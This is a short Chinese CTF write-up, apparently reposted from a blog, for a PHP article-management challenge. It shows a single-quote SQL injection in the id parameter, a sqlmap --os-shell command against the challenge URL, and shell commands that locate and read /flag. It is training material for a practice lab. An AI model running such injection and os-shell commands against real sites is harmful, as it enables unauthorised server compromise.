自学内容网 自学内容网

青少年CTF练习平台 文章管理系统(sqlmap使用os-shell找flag)PHP

题目

点击下一篇出现参数id,单引号报错

 找到注入点启动sqlmap

用sqlmap的os-shell执行命令获取flag

python sqlmap.py -u http://challenge.qsnctf.com:32372/?id=1 --os-shell

 执行命令查找flag

find / -name flag*
find / -name *flag

 

发现/flag目录,拿下FLAG

cat /flag

 


原文地址:https://blog.csdn.net/2301_77012231/article/details/145201838

免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!